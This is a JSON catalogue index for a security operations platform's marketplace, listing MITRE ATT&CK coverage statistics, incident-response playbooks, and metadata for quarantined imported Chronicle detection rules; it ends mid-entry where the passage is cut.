{ "$schema": "https://example.com/schemas/marketplace/v1.json", "version": "1.0.0", "generated": "2026-05-14T12:28:24Z", "categories": [ { "id": "playbooks", "label": "Response Playbooks", "description": "Automated incident-response workflows triggered by alerts or manual invocation." }, { "id": "detections", "label": "Detection Rules", "description": "Curated YAML rules for identifying malicious or suspicious activity across cloud, identity, endpoint, network, application, and data-exfil categories." }, { "id": "plugins", "label": "Plugins", "description": "Reference connectors, enrichers, actions, and widgets shipped with both Python and Go SDK implementations for cross-language parity." } ], "stats": { "total": 7117, "playbooks": 62, "detections": 6998, "plugins": 57, "verified": 996, "community": 1, "by_tier": { "beta": 7, "community": 1, "imported": 6113, "stable": 996 }, "detections_by_tier": { "community": 1, "imported": 6113, "stable": 884 }, "quarantined": 5921 }, "mitre_coverage": { "techniques": { "T1001.003": 2, "T1003": 51, "T1003.001": 87, "T1003.002": 37, "T1003.003": 31, "T1003.004": 13, "T1003.005": 9, "T1003.006": 13, "T1003.008": 5, "T1005": 18, "T1006": 1, "T1007": 11, "T1008": 5, "T1010": 2, "T1011": 1, "T1012": 24, "T1014": 8, "T1016": 20, "T1016.001": 1, "T1018": 42, "T1020": 12, "T1020.001": 1, "T1021": 26, "T1021.001": 34, "T1021.002": 54, "T1021.003": 23, "T1021.004": 13, "T1021.005": 1, "T1021.006": 22, "T1021.007": 5, "T1025": 3, "T1027": 103, "T1027.001": 3, "T1027.002": 1, "T1027.003": 5, "T1027.004": 6, "T1027.005": 6, "T1027.009": 1, "T1027.010": 9, "T1027.011": 3, "T1027.013": 1, "T1029": 1, "T1030": 6, "T1033": 45, "T1036": 50, "T1036.002": 5, "T1036.003": 36, "T1036.004": 2, "T1036.005": 21, "T1036.006": 1, "T1036.007": 3, "T1036.008": 3, "T1036.009": 2, "T1037": 3, "T1037.001": 5, "T1037.002": 2, "T1037.004": 3, "T1037.005": 1, "T1039": 4, "T1040": 14, "T1041": 20, "T1046": 33, "T1047": 72, "T1048": 15, "T1048.001": 1, 
"T1048.003": 19, "T1049": 16, "T1052": 2, "T1052.001": 1, "T1053": 22, "T1053.001": 1, "T1053.002": 12, "T1053.003": 21, "T1053.005": 58, "T1053.006": 6, "T1053.007": 2, "T1055": 56, "T1055.001": 11, "T1055.002": 4, "T1055.003": 3, "T1055.004": 1, "T1055.009": 2, "T1055.011": 1, "T1055.012": 6, "T1055.013": 1, "T1056": 2, "T1056.001": 4, "T1056.002": 4, "T1057": 8, "T1059": 121, "T1059.001": 243, "T1059.002": 11, "T1059.003": 41, "T1059.004": 29, "T1059.005": 31, "T1059.006": 4, "T1059.007": 25, "T1059.009": 4, "T1059.012": 9, "T1059.013": 1, "T1068": 38, "T1069": 8, "T1069.001": 29, "T1069.002": 35, "T1069.003": 4, "T1070": 35, "T1070.001": 8, "T1070.002": 1, "T1070.003": 13, "T1070.004": 28, "T1070.005": 5, "T1070.006": 6, "T1070.008": 7, "T1071": 14, "T1071.001": 54, "T1071.002": 1, "T1071.003": 3, "T1071.004": 23, "T1072": 9, "T1074": 3, "T1074.001": 6, "T1078": 128, "T1078.001": 10, "T1078.002": 14, "T1078.003": 11, "T1078.004": 98, "T1082": 49, "T1083": 28, "T1087": 21, "T1087.001": 28, "T1087.002": 52, "T1087.004": 10, "T1090": 29, "T1090.001": 8, "T1090.002": 3, "T1090.003": 11, "T1091": 5, "T1095": 8, "T1098": 88, "T1098.001": 26, "T1098.002": 6, "T1098.003": 34, "T1098.004": 12, "T1098.005": 7, "T1098.007": 1, "T1102": 17, "T1102.001": 4, "T1102.002": 5, "T1102.003": 2, "T1105": 118, "T1106": 11, "T1110": 57, "T1110.001": 18, "T1110.002": 1, "T1110.003": 44, "T1110.004": 16, "T1112": 164, "T1113": 16, "T1114": 6, "T1114.001": 7, "T1114.002": 16, "T1114.003": 12, "T1115": 11, "T1119": 8, "T1120": 2, "T1123": 9, "T1124": 4, "T1125": 1, "T1127": 23, "T1127.001": 6, "T1129": 2, "T1132.001": 4, "T1133": 67, "T1134": 6, "T1134.001": 13, "T1134.002": 7, "T1134.003": 3, "T1134.004": 3, "T1134.005": 5, "T1135": 15, "T1136": 11, "T1136.001": 32, "T1136.002": 7, "T1136.003": 24, "T1137": 11, "T1137.002": 2, "T1137.003": 1, "T1137.006": 4, "T1140": 18, "T1176": 1, "T1176.001": 3, "T1185": 12, "T1187": 12, "T1189": 4, "T1190": 177, "T1195": 23, "T1195.001": 2, 
"T1195.002": 17, "T1197": 23, "T1199": 16, "T1200": 13, "T1201": 14, "T1202": 45, "T1203": 28, "T1204": 37, "T1204.001": 7, "T1204.002": 50, "T1204.003": 10, "T1204.004": 6, "T1207": 8, "T1210": 13, "T1211": 4, "T1212": 8, "T1213": 10, "T1213.002": 2, "T1213.003": 5, "T1216": 14, "T1216.001": 2, "T1217": 4, "T1218": 156, "T1218.001": 10, "T1218.002": 2, "T1218.003": 12, "T1218.004": 7, "T1218.005": 21, "T1218.007": 17, "T1218.008": 11, "T1218.009": 10, "T1218.010": 24, "T1218.011": 49, "T1218.012": 1, "T1218.013": 3, "T1218.014": 6, "T1219": 19, "T1219.002": 41, "T1220": 8, "T1221": 1, "T1222": 9, "T1222.001": 22, "T1222.002": 9, "T1404": 2, "T1480": 1, "T1482": 31, "T1484": 13, "T1484.001": 16, "T1484.002": 6, "T1485": 83, "T1485.001": 2, "T1486": 27, "T1489": 38, "T1490": 48, "T1491": 2, "T1491.001": 4, "T1495": 1, "T1496": 15, "T1497": 7, "T1497.001": 3, "T1497.003": 3, "T1498": 12, "T1498.001": 2, "T1498.002": 3, "T1499": 6, "T1499.001": 1, "T1499.004": 3, "T1505": 4, "T1505.001": 7, "T1505.002": 3, "T1505.003": 41, "T1505.004": 14, "T1505.005": 1, "T1505.006": 1, "T1518": 5, "T1518.001": 7, "T1525": 9, "T1526": 11, "T1528": 28, "T1529": 16, "T1530": 46, "T1531": 20, "T1535": 6, "T1537": 23, "T1538": 1, "T1539": 7, "T1542": 1, "T1542.001": 4, "T1542.003": 2, "T1542.005": 1, "T1543": 25, "T1543.001": 8, "T1543.002": 5, "T1543.003": 60, "T1543.004": 4, "T1546": 15, "T1546.001": 7, "T1546.002": 6, "T1546.003": 17, "T1546.004": 6, "T1546.007": 4, "T1546.008": 7, "T1546.009": 2, "T1546.010": 2, "T1546.011": 10, "T1546.012": 5, "T1546.013": 3, "T1546.014": 2, "T1546.015": 12, "T1547": 15, "T1547.001": 40, "T1547.002": 1, "T1547.003": 2, "T1547.004": 4, "T1547.005": 4, "T1547.006": 16, "T1547.008": 2, "T1547.009": 4, "T1547.010": 6, "T1547.012": 7, "T1547.014": 3, "T1547.015": 3, "T1548": 34, "T1548.001": 12, "T1548.002": 76, "T1548.003": 39, "T1548.004": 1, "T1550": 13, "T1550.001": 4, "T1550.002": 7, "T1550.003": 9, "T1550.004": 2, "T1552": 21, "T1552.001": 38, 
"T1552.002": 7, "T1552.003": 3, "T1552.004": 14, "T1552.005": 3, "T1552.006": 7, "T1552.007": 9, "T1553": 4, "T1553.001": 7, "T1553.002": 2, "T1553.003": 4, "T1553.004": 13, "T1553.005": 11, "T1554": 10, "T1555": 13, "T1555.001": 7, "T1555.003": 15, "T1555.004": 6, "T1555.005": 5, "T1556": 72, "T1556.001": 1, "T1556.002": 3, "T1556.003": 1, "T1556.004": 3, "T1556.006": 28, "T1556.007": 1, "T1557": 13, "T1557.001": 19, "T1557.002": 6, "T1557.003": 1, "T1558": 11, "T1558.001": 3, "T1558.002": 2, "T1558.003": 28, "T1558.004": 10, "T1559": 6, "T1559.001": 4, "T1559.002": 1, "T1560": 6, "T1560.001": 22, "T1561.001": 2, "T1561.002": 4, "T1562": 28, "T1562.001": 137, "T1562.002": 13, "T1562.003": 2, "T1562.004": 18, "T1562.006": 4, "T1562.007": 8, "T1562.008": 32, "T1562.012": 5, "T1563.002": 4, "T1564": 14, "T1564.001": 10, "T1564.002": 4, "T1564.003": 11, "T1564.004": 25, "T1564.006": 3, "T1564.008": 4, "T1565": 3, "T1565.001": 11, "T1565.002": 3, "T1566": 30, "T1566.001": 52, "T1566.002": 14, "T1566.003": 1, "T1567": 33, "T1567.001": 2, "T1567.002": 23, "T1568": 1, "T1568.001": 2, "T1568.002": 4, "T1569": 5, "T1569.001": 1, "T1569.002": 50, "T1570": 10, "T1571": 9, "T1572": 38, "T1573": 7, "T1573.002": 12, "T1574": 14, "T1574.001": 95, "T1574.002": 4, "T1574.005": 2, "T1574.006": 10, "T1574.007": 2, "T1574.008": 1, "T1574.009": 1, "T1574.011": 13, "T1574.012": 2, "T1574.014": 1, "T1578": 1, "T1578.002": 2, "T1578.003": 1, "T1578.005": 1, "T1580": 6, "T1583.001": 4, "T1583.006": 1, "T1584": 3, "T1586": 3, "T1586.003": 36, "T1587": 3, "T1587.001": 8, "T1587.002": 1, "T1587.003": 1, "T1588": 2, "T1588.001": 1, "T1588.002": 13, "T1588.004": 1, "T1589": 1, "T1589.001": 2, "T1589.002": 2, "T1590": 3, "T1590.001": 2, "T1590.002": 2, "T1590.005": 4, "T1591.004": 2, "T1592": 6, "T1592.001": 1, "T1592.004": 3, "T1593.003": 2, "T1595": 7, "T1595.001": 1, "T1595.002": 7, "T1598": 1, "T1598.002": 1, "T1599": 1, "T1599.001": 1, "T1600.001": 1, "T1601.001": 1, "T1606": 2, 
"T1606.002": 1, "T1608": 2, "T1608.003": 1, "T1609": 4, "T1610": 12, "T1611": 29, "T1612": 1, "T1613": 1, "T1614.001": 2, "T1615": 5, "T1619": 1, "T1620": 6, "T1621": 25, "T1622": 1, "T1647": 2, "T1649": 22, "T1653": 1, "T1654": 1, "T1656": 1, "T1659": 1, "T1673": 2, "T1685": 156, "T1685.001": 26, "T1685.002": 3, "T1685.004": 1, "T1685.005": 6, "T1685.006": 4, "T1686": 7, "T1686.001": 5, "T1686.003": 17, "T1689": 1, "T1690": 1 }, "unique_techniques": 493, "total_with_mitre": 5782, "by_tier": { "community": { "T1078.004": 1 }, "stable": { "T1003": 2, "T1003.001": 3, "T1003.002": 1, "T1003.003": 2, "T1003.006": 3, "T1003.008": 2, "T1011": 1, "T1014": 2, "T1018": 5, "T1020": 2, "T1021": 1, "T1021.001": 2, "T1021.002": 7, "T1021.004": 1, "T1021.006": 3, "T1027": 5, "T1030": 1, "T1036.005": 1, "T1037": 2, "T1037.001": 1, "T1037.002": 1, "T1037.004": 2, "T1040": 2, "T1041": 8, "T1046": 2, "T1047": 3, "T1048": 1, "T1048.003": 2, "T1052": 2, "T1052.001": 1, "T1053.001": 1, "T1053.003": 5, "T1053.005": 4, "T1053.006": 2, "T1055": 2, "T1055.001": 1, "T1055.012": 1, "T1056.001": 1, "T1059": 8, "T1059.001": 5, "T1059.002": 3, "T1059.004": 8, "T1059.005": 1, "T1068": 3, "T1069.003": 1, "T1070": 3, "T1070.001": 3, "T1070.002": 1, "T1070.003": 2, "T1071": 4, "T1071.001": 10, "T1071.004": 5, "T1074.001": 1, "T1078": 37, "T1078.001": 4, "T1078.002": 3, "T1078.003": 1, "T1078.004": 38, "T1083": 2, "T1087.001": 2, "T1087.002": 5, "T1087.004": 3, "T1090": 3, "T1090.003": 6, "T1095": 3, "T1098": 29, "T1098.001": 21, "T1098.003": 8, "T1098.004": 8, "T1098.007": 1, "T1105": 3, "T1110": 9, "T1110.001": 4, "T1110.003": 4, "T1110.004": 4, "T1112": 1, "T1113": 2, "T1114.002": 5, "T1114.003": 4, "T1127.001": 1, "T1133": 13, "T1134": 1, "T1135": 3, "T1136": 3, "T1136.001": 5, "T1136.003": 2, "T1140": 1, "T1176": 1, "T1185": 1, "T1190": 30, "T1195": 2, "T1195.002": 10, "T1197": 1, "T1199": 15, "T1204": 2, "T1204.001": 1, "T1204.002": 5, "T1212": 2, "T1213": 3, "T1213.002": 1, "T1218": 1, 
"T1218.003": 1, "T1218.004": 1, "T1218.005": 2, "T1218.010": 1, "T1218.011": 4, "T1219": 1, "T1222.001": 2, "T1222.002": 1, "T1404": 2, "T1482": 1, "T1484.001": 2, "T1484.002": 2, "T1485": 28, "T1486": 8, "T1489": 2, "T1490": 7, "T1496": 2, "T1498": 4, "T1498.001": 2, "T1498.002": 2, "T1499": 1, "T1505.003": 3, "T1525": 8, "T1528": 6, "T1530": 36, "T1531": 5, "T1535": 1, "T1537": 10, "T1539": 4, "T1542.001": 1, "T1543": 1, "T1543.001": 4, "T1543.002": 3, "T1543.003": 3, "T1543.004": 2, "T1546.002": 1, "T1546.003": 3, "T1546.004": 2, "T1546.010": 1, "T1546.011": 1, "T1546.012": 1, "T1546.014": 1, "T1546.015": 1, "T1547": 3, "T1547.001": 4, "T1547.004": 1, "T1547.005": 2, "T1547.006": 6, "T1547.010": 1, "T1547.015": 2, "T1548": 1, "T1548.001": 6, "T1548.002": 4, "T1548.003": 3, "T1548.004": 1, "T1550": 3, "T1550.002": 2, "T1550.003": 1, "T1550.004": 1, "T1552": 1, "T1552.001": 12, "T1552.004": 2, "T1552.005": 2, "T1552.007": 1, "T1553": 1, "T1553.001": 5, "T1553.002": 1, "T1553.004": 2, "T1554": 1, "T1555": 1, "T1555.001": 5, "T1555.003": 3, "T1555.004": 1, "T1555.005": 1, "T1556": 41, "T1556.001": 1, "T1556.003": 1, "T1556.004": 1, "T1556.006": 14, "T1556.007": 1, "T1557": 2, "T1557.001": 5, "T1557.002": 3, "T1558.001": 2, "T1558.002": 2, "T1558.003": 5, "T1558.004": 4, "T1560.001": 3, "T1561.002": 1, "T1562": 5, "T1562.001": 40, "T1562.004": 7, "T1562.006": 2, "T1562.007": 1, "T1562.008": 13, "T1562.012": 2, "T1564.001": 1, "T1564.008": 1, "T1565.001": 4, "T1565.002": 1, "T1566": 3, "T1566.001": 2, "T1566.002": 2, "T1566.003": 1, "T1567": 12, "T1567.002": 7, "T1568.001": 2, "T1568.002": 2, "T1570": 3, "T1572": 9, "T1573": 1, "T1573.002": 7, "T1574": 1, "T1574.002": 4, "T1574.006": 3, "T1578.002": 1, "T1583.001": 4, "T1592": 2, "T1595.002": 1, "T1599": 1, "T1600.001": 1, "T1606.002": 1, "T1609": 1, "T1610": 12, "T1611": 25, "T1612": 1, "T1620": 2, "T1621": 5, "T1647": 1, "T1656": 1, "T1659": 1 }, "imported": { "T1001.003": 2, "T1003": 49, "T1003.001": 84, 
"T1003.002": 36, "T1003.003": 29, "T1003.004": 13, "T1003.005": 9, "T1003.006": 10, "T1003.008": 3, "T1005": 18, "T1006": 1, "T1007": 11, "T1008": 5, "T1010": 2, "T1012": 24, "T1014": 6, "T1016": 20, "T1016.001": 1, "T1018": 37, "T1020": 10, "T1020.001": 1, "T1021": 25, "T1021.001": 32, "T1021.002": 47, "T1021.003": 23, "T1021.004": 12, "T1021.005": 1, "T1021.006": 19, "T1021.007": 5, "T1025": 3, "T1027": 98, "T1027.001": 3, "T1027.002": 1, "T1027.003": 5, "T1027.004": 6, "T1027.005": 6, "T1027.009": 1, "T1027.010": 9, "T1027.011": 3, "T1027.013": 1, "T1029": 1, "T1030": 5, "T1033": 45, "T1036": 50, "T1036.002": 5, "T1036.003": 36, "T1036.004": 2, "T1036.005": 20, "T1036.006": 1, "T1036.007": 3, "T1036.008": 3, "T1036.009": 2, "T1037": 1, "T1037.001": 4, "T1037.002": 1, "T1037.004": 1, "T1037.005": 1, "T1039": 4, "T1040": 12, "T1041": 12, "T1046": 31, "T1047": 69, "T1048": 14, "T1048.001": 1, "T1048.003": 17, "T1049": 16, "T1053": 22, "T1053.002": 12, "T1053.003": 16, "T1053.005": 54, "T1053.006": 4, "T1053.007": 2, "T1055": 54, "T1055.001": 10, "T1055.002": 4, "T1055.003": 3, "T1055.004": 1, "T1055.009": 2, "T1055.011": 1, "T1055.012": 5, "T1055.013": 1, "T1056": 2, "T1056.001": 3, "T1056.002": 4, "T1057": 8, "T1059": 113, "T1059.001": 238, "T1059.002": 8, "T1059.003": 41, "T1059.004": 21, "T1059.005": 30, "T1059.006": 4, "T1059.007": 25, "T1059.009": 4, "T1059.012": 9, "T1059.013": 1, "T1068": 35, "T1069": 8, "T1069.001": 29, "T1069.002": 35, "T1069.003": 3, "T1070": 32, "T1070.001": 5, "T1070.003": 11, "T1070.004": 28, "T1070.005": 5, "T1070.006": 6, "T1070.008": 7, "T1071": 10, "T1071.001": 44, "T1071.002": 1, "T1071.003": 3, "T1071.004": 18, "T1072": 9, "T1074": 3, "T1074.001": 5, "T1078": 91, "T1078.001": 6, "T1078.002": 11, "T1078.003": 10, "T1078.004": 59, "T1082": 49, "T1083": 26, "T1087": 21, "T1087.001": 26, "T1087.002": 47, "T1087.004": 7, "T1090": 26, "T1090.001": 8, "T1090.002": 3, "T1090.003": 5, "T1091": 5, "T1095": 5, "T1098": 59, "T1098.001": 5, 
"T1098.002": 6, "T1098.003": 26, "T1098.004": 4, "T1098.005": 7, "T1102": 17, "T1102.001": 4, "T1102.002": 5, "T1102.003": 2, "T1105": 115, "T1106": 11, "T1110": 48, "T1110.001": 14, "T1110.002": 1, "T1110.003": 40, "T1110.004": 12, "T1112": 163, "T1113": 14, "T1114": 6, "T1114.001": 7, "T1114.002": 11, "T1114.003": 8, "T1115": 11, "T1119": 8, "T1120": 2, "T1123": 9, "T1124": 4, "T1125": 1, "T1127": 23, "T1127.001": 5, "T1129": 2, "T1132.001": 4, "T1133": 54, "T1134": 5, "T1134.001": 13, "T1134.002": 7, "T1134.003": 3, "T1134.004": 3, "T1134.005": 5, "T1135": 12, "T1136": 8, "T1136.001": 27, "T1136.002": 7, "T1136.003": 22, "T1137": 11, "T1137.002": 2, "T1137.003": 1, "T1137.006": 4, "T1140": 17, "T1176.001": 3, "T1185": 11, "T1187": 12, "T1189": 4, "T1190": 147, "T1195": 21, "T1195.001": 2, "T1195.002": 7, "T1197": 22, "T1199": 1, "T1200": 13, "T1201": 14, "T1202": 45, "T1203": 28, "T1204": 35, "T1204.001": 6, "T1204.002": 45, "T1204.003": 10, "T1204.004": 6, "T1207": 8, "T1210": 13, "T1211": 4, "T1212": 6, "T1213": 7, "T1213.002": 1, "T1213.003": 5, "T1216": 14, "T1216.001": 2, "T1217": 4, "T1218": 155, "T1218.001": 10, "T1218.002": 2, "T1218.003": 11, "T1218.004": 6, "T1218.005": 19, "T1218.007": 17, "T1218.008": 11, "T1218.009": 10, "T1218.010": 23, "T1218.011": 45, "T1218.012": 1, "T1218.013": 3, "T1218.014": 6, "T1219": 18, "T1219.002": 41, "T1220": 8, "T1221": 1, "T1222": 9, "T1222.001": 20, "T1222.002": 8, "T1480": 1, "T1482": 30, "T1484": 13, "T1484.001": 14, "T1484.002": 4, "T1485": 55, "T1485.001": 2, "T1486": 19, "T1489": 36, "T1490": 41, "T1491": 2, "T1491.001": 4, "T1495": 1, "T1496": 13, "T1497": 7, "T1497.001": 3, "T1497.003": 3, "T1498": 8, "T1498.002": 1, "T1499": 5, "T1499.001": 1, "T1499.004": 3, "T1505": 4, "T1505.001": 7, "T1505.002": 3, "T1505.003": 38, "T1505.004": 14, "T1505.005": 1, "T1505.006": 1, "T1518": 5, "T1518.001": 7, "T1525": 1, "T1526": 11, "T1528": 22, "T1529": 16, "T1530": 10, "T1531": 15, "T1535": 5, "T1537": 13, "T1538": 1, 
"T1539": 3, "T1542": 1, "T1542.001": 3, "T1542.003": 2, "T1542.005": 1, "T1543": 24, "T1543.001": 4, "T1543.002": 2, "T1543.003": 57, "T1543.004": 2, "T1546": 15, "T1546.001": 7, "T1546.002": 5, "T1546.003": 14, "T1546.004": 4, "T1546.007": 4, "T1546.008": 7, "T1546.009": 2, "T1546.010": 1, "T1546.011": 9, "T1546.012": 4, "T1546.013": 3, "T1546.014": 1, "T1546.015": 11, "T1547": 12, "T1547.001": 36, "T1547.002": 1, "T1547.003": 2, "T1547.004": 3, "T1547.005": 2, "T1547.006": 10, "T1547.008": 2, "T1547.009": 4, "T1547.010": 5, "T1547.012": 7, "T1547.014": 3, "T1547.015": 1, "T1548": 33, "T1548.001": 6, "T1548.002": 72, "T1548.003": 36, "T1550": 10, "T1550.001": 4, "T1550.002": 5, "T1550.003": 8, "T1550.004": 1, "T1552": 20, "T1552.001": 26, "T1552.002": 7, "T1552.003": 3, "T1552.004": 12, "T1552.005": 1, "T1552.006": 7, "T1552.007": 8, "T1553": 3, "T1553.001": 2, "T1553.002": 1, "T1553.003": 4, "T1553.004": 11, "T1553.005": 11, "T1554": 9, "T1555": 12, "T1555.001": 2, "T1555.003": 12, "T1555.004": 5, "T1555.005": 4, "T1556": 31, "T1556.002": 3, "T1556.004": 2, "T1556.006": 14, "T1557": 11, "T1557.001": 14, "T1557.002": 3, "T1557.003": 1, "T1558": 11, "T1558.001": 1, "T1558.003": 23, "T1558.004": 6, "T1559": 6, "T1559.001": 4, "T1559.002": 1, "T1560": 6, "T1560.001": 19, "T1561.001": 2, "T1561.002": 3, "T1562": 23, "T1562.001": 97, "T1562.002": 13, "T1562.003": 2, "T1562.004": 11, "T1562.006": 2, "T1562.007": 7, "T1562.008": 19, "T1562.012": 3, "T1563.002": 4, "T1564": 14, "T1564.001": 9, "T1564.002": 4, "T1564.003": 11, "T1564.004": 25, "T1564.006": 3, "T1564.008": 3, "T1565": 3, "T1565.001": 7, "T1565.002": 2, "T1566": 27, "T1566.001": 50, "T1566.002": 12, "T1567": 21, "T1567.001": 2, "T1567.002": 16, "T1568": 1, "T1568.002": 2, "T1569": 5, "T1569.001": 1, "T1569.002": 50, "T1570": 7, "T1571": 9, "T1572": 29, "T1573": 6, "T1573.002": 5, "T1574": 13, "T1574.001": 95, "T1574.005": 2, "T1574.006": 7, "T1574.007": 2, "T1574.008": 1, "T1574.009": 1, "T1574.011": 13, 
"T1574.012": 2, "T1574.014": 1, "T1578": 1, "T1578.002": 1, "T1578.003": 1, "T1578.005": 1, "T1580": 6, "T1583.006": 1, "T1584": 3, "T1586": 3, "T1586.003": 36, "T1587": 3, "T1587.001": 8, "T1587.002": 1, "T1587.003": 1, "T1588": 2, "T1588.001": 1, "T1588.002": 13, "T1588.004": 1, "T1589": 1, "T1589.001": 2, "T1589.002": 2, "T1590": 3, "T1590.001": 2, "T1590.002": 2, "T1590.005": 4, "T1591.004": 2, "T1592": 4, "T1592.001": 1, "T1592.004": 3, "T1593.003": 2, "T1595": 7, "T1595.001": 1, "T1595.002": 6, "T1598": 1, "T1598.002": 1, "T1599.001": 1, "T1601.001": 1, "T1606": 2, "T1608": 2, "T1608.003": 1, "T1609": 3, "T1611": 4, "T1613": 1, "T1614.001": 2, "T1615": 5, "T1619": 1, "T1620": 4, "T1621": 20, "T1622": 1, "T1647": 1, "T1649": 22, "T1653": 1, "T1654": 1, "T1673": 2, "T1685": 156, "T1685.001": 26, "T1685.002": 3, "T1685.004": 1, "T1685.005": 6, "T1685.006": 4, "T1686": 7, "T1686.001": 5, "T1686.003": 17, "T1689": 1, "T1690": 1 } } }, "items": [ { "id": "account-takeover-response-v1", "type": "detection", "name": "Account Takeover Response", "description": "Responds to suspected account takeover (ATO) events. Forces session termination, resets credentials, enables MFA enforcement, and notifies the user and security team.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "account-takeover", "identity", "iam", "credential-compromise" ], "severity": null, "category": "playbooks", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/playbooks/account-takeover-response.yaml" }, { "id": "anomalous-behavior-response-v1", "type": "detection", "name": "Anomalous User Behavior Response", "description": "Responds to anomalous user behavior flagged by UEBA systems including unusual access patterns, after-hours activity, mass data access, or deviation from behavioral baselines. 
Escalates based on risk score and enables adaptive authentication controls.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "anomalous", "ueba", "behavioral-analytics", "identity", "insider" ], "severity": null, "category": "playbooks", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/playbooks/anomalous-behavior-response.yaml" }, { "id": "bec-response-v1", "type": "detection", "name": "Business Email Compromise (BEC) Response", "description": "Responds to Business Email Compromise alerts. Identifies spoofed or compromised executive accounts used to initiate fraudulent wire transfers or sensitive data requests. Blocks sender, alerts finance/legal, and coordinates with email gateway.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "bec", "email", "fraud", "executive", "financial-fraud" ], "severity": null, "category": "playbooks", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/playbooks/bec-response.yaml" }, { "id": "brute-force-response-v1", "type": "detection", "name": "Brute Force Attack Response", "description": "Responds to brute force and credential stuffing attacks against authentication endpoints. 
Implements progressive lockout, blocks attacking IPs, enables CAPTCHA enforcement, and notifies the security team.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "brute-force", "credential-stuffing", "authentication", "network", "identity" ], "severity": null, "category": "playbooks", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/playbooks/brute-force-response.yaml" }, { "id": "chronicle-detection-rules-a-scheduled-task-was-created", "type": "detection", "name": "a_scheduled_task_was_created", "description": "a_scheduled_task_was_created", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/a-scheduled-task-was-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "a_scheduled_task_was_created", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/a_scheduled_task_was_created.yaral" } }, { "id": "chronicle-detection-rules-a-variant-of-data-stealer-trojan-activity", "type": "detection", "name": "a_variant_of_data_stealer_trojan_activity", "description": "a_variant_of_data_stealer_trojan_activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": 
"imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/a-variant-of-data-stealer-trojan-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "a_variant_of_data_stealer_trojan_activity", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/a_variant_of_data_stealer__trojan_activity.yaral" } }, { "id": "chronicle-detection-rules-a-variant-of-lokibot-trojan", "type": "detection", "name": "a_variant_of_lokibot_trojan", "description": "a_variant_of_lokibot_trojan", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/a-variant-of-lokibot-trojan.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "a_variant_of_lokibot_trojan", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/a_variant_of_lokibot_trojan.yaral" } }, { "id": "chronicle-detection-rules-a-webshell-ensiko-with-ransomware-capabilities", "type": "detection", "name": "a_webshell_ensiko_with_ransomware_capabilities", "description": "a_webshell_ensiko_with_ransomware_capabilities", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", 
"category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/a-webshell-ensiko-with-ransomware-capabilities.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "a_webshell_ensiko_with_ransomware_capabilities", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/webserver/a_webshell__ensiko__with_ransomware_capabilities.yaral" } }, { "id": "chronicle-detection-rules-abusing-attribexe-to-change-file-attributes", "type": "detection", "name": "abusing_attribexe_to_change_file_attributes", "description": "abusing_attribexe_to_change_file_attributes", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/abusing-attribexe-to-change-file-attributes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "abusing_attribexe_to_change_file_attributes", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/abusing_attrib_exe_to_change_file_attributes.yaral" } }, { "id": 
